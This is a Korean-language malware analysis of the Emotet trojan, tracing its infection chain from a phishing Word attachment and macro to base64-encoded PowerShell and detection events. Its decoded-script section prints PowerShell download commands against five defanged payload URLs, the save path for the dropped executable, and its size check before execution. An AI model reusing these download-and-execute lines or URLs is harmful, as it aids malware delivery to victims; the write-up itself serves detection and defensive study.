Emotet(이모텟)?
– 주로 이메일을 통해 확산되는 트로이 목마
– 합법적인 이메일처럼 보이도록 가장하여 사용자가 악성 파일을 클릭하도록 유도
– 트로이 목마를 업데이트하고 기본적으로 시스템에 액세스한 다음 운영자가 추가 페이로드를 다운로드할 수 있도록 하는 악성코드 유형인 “로더”로 작동하도록 구성
– 감염된 호스트에서 은행 자격 증명을 훔치거나, 피해자들로부터 돈을 갈취하는 것을 목표로 동작

 

Emotet 실행/분석

1. 사회 공학 기법을 이용해 공격 대상에게 메일 발송

[사진 1] Word 파일 첨부된 메일

 

2. 공격 대상은 의심없이 첨부 파일 다운로드

[사진 2] 필터탐지 – 웹브라우저 파일 생성

 

3. 파일 Open. 매크로 실행을 위해 ‘Enable Content’ 클릭

[사진 3] Enable Content 클릭

 

4. Base64 인코딩된 코드 PowerShell 프로세스로 실행 시도

[사진 4] 필터탐지 – PowerShell [T1059.001] (EID: 4688)

 

5. PowerShell 명령어에 의해 conhost 실행

[사진 5] 필터탐지 – PowerShell conhost 실행

 


[사진 6] WmiPrvSE.exe -> powershell.exe -> conhost.exe

 

6. PowerShell 스크립트 코드 실행

[사진 7] 필터탐지 – PowerShell [T1059.001] (EID: 4104)

 

7. PowerShell 스크립트 코드 분석

[사진 8] PowerShell 스크립트 코드 디코딩

 

1) 아래 URL 에서 파일 다운로드
new-object NeT.wEBClIEnt DOwNlOaDfiLe(hxxp://blockchainjoblist.com/wp-admin/014080/)
new-object NeT.wEBClIEnt DOwNlOaDfiLe(hxxps://womenempowermentpakistan.com/wp-admin/paba5q52/)
new-object NeT.wEBClIEnt DOwNlOaDfiLe(hxxps://atnimanvilla.com/wp-content/073735/)
new-object NeT.wEBClIEnt DOwNlOaDfiLe(hxxps://yeuquynhnhai.com/upload/41830/)
new-object NeT.wEBClIEnt DOwNlOaDfiLe(hxxps://deepikarai.com/js/4bzs6/)

2) 아래 경로에 파일 저장
$env:userprofile\284.exe

3) 23931 bytes 이상이면 실행
(Get-Item $env:userprofile\284.exe).LeNgTh -ge 23931

 

8. 사용자 폴더에 파일 생성

[사진 9] exe 파일 생성 전 (오후 12:17:19)

 


[사진 10] 284.exe 파일 생성 (오후 12:17:20)

 


[사진 11] 필터탐지 – PowerShell exe 파일 생성

 

[참조]

https://en.wikipedia.org/wiki/Emotet
https://www.malwarebytes.com/emotet